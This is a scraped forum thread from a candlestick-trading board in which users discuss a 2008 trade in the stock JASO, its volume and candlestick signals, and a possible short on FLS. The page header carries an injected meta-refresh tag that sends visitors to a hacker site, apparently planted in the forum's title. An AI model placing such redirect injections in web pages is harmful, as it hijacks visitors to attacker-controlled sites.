Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - JASO
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

JASO

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
ninner

PostPosted: Sat Mar 22, 2008 2:57 pm    Post subject: JASO Reply with quote

any comments on JASO????
Harry

PostPosted: Sat Mar 29, 2008 10:43 am    Post subject: JASO Reply with quote

Ninner, good call on jaso. I see it is up over 20 % since your post on it. If you traded it last week you make good money in this bear market. Just for the records what did you see in the charts on the 22 that make you get interested in it? Do you know some nonpublic information on the company or was there something in the charts that make it come up on your scans? I couldn't see anything. I am asking because if there is something I am missing please point it out. This was not luck. I know you had picked up on something. What did you see the days or weeks before the 22nd that made you like it?

Thanks in advance;

Smile

harry
ninner

PostPosted: Sat Mar 29, 2008 7:36 pm    Post subject: JASO Reply with quote

HEY HARRY, yah it wasnt luck but i have been following it for abit ..i actually shorted it before it crashed and made some nice money...the reason why i bought it ..actually it was before the 22 wasnt based on candlesticks but based on real price and its volume and price action ..the candlesticks i am using as confirmation... I used the week of oct 12 volume as my benchmark and when i saw it coming down into that bar on quite abit lighter volume i bought in...i noticed the candlesticks indicated that selling was diminishing ..just based on doji and on march 3 ..there was some indication of buying based on the candle formation and it tested the prior days low on lower volume and the low was rejected...very important in my books and when i bought...then based on candlesticks with the stochastics in the oversold area you see classic panic selling esp with that big long red candle....i sold on friday actually and now i may buy some cheap puts depending how it acts monday and tuesday of next week...its doing a 100% move of a move and that imo is the most a stock can do which is right at that swing point on feb 13 and volume is dying up here compared to the benchmark volumes of jan 18 and nov 9 on a weekly basis....i hope this helps....if u have any other questions feel free to ask i love talking about this stuff.

cheers

ninner

ps another stock im looking at to maybe short or buy puts is FLS....to me it looks like volume is dying up here and that gap could be closed...it also broke a swing point on huge volume and now has retraced back up.

[/i]
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: